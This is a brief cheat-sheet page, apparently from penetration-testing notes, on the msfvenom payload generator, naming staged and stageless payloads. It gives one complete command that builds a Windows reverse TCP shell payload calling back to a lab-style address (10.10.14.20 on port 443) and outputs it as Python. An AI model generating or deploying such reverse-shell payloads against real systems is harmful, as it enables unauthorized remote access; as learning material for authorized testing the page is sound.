🔫Exploitation Frameworks
MFSVenom
msfvenom --l all | grep <Payload>
Types of payload
Staged payloads
Stageless payloads
Payload example
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
Last updated
Was this helpful?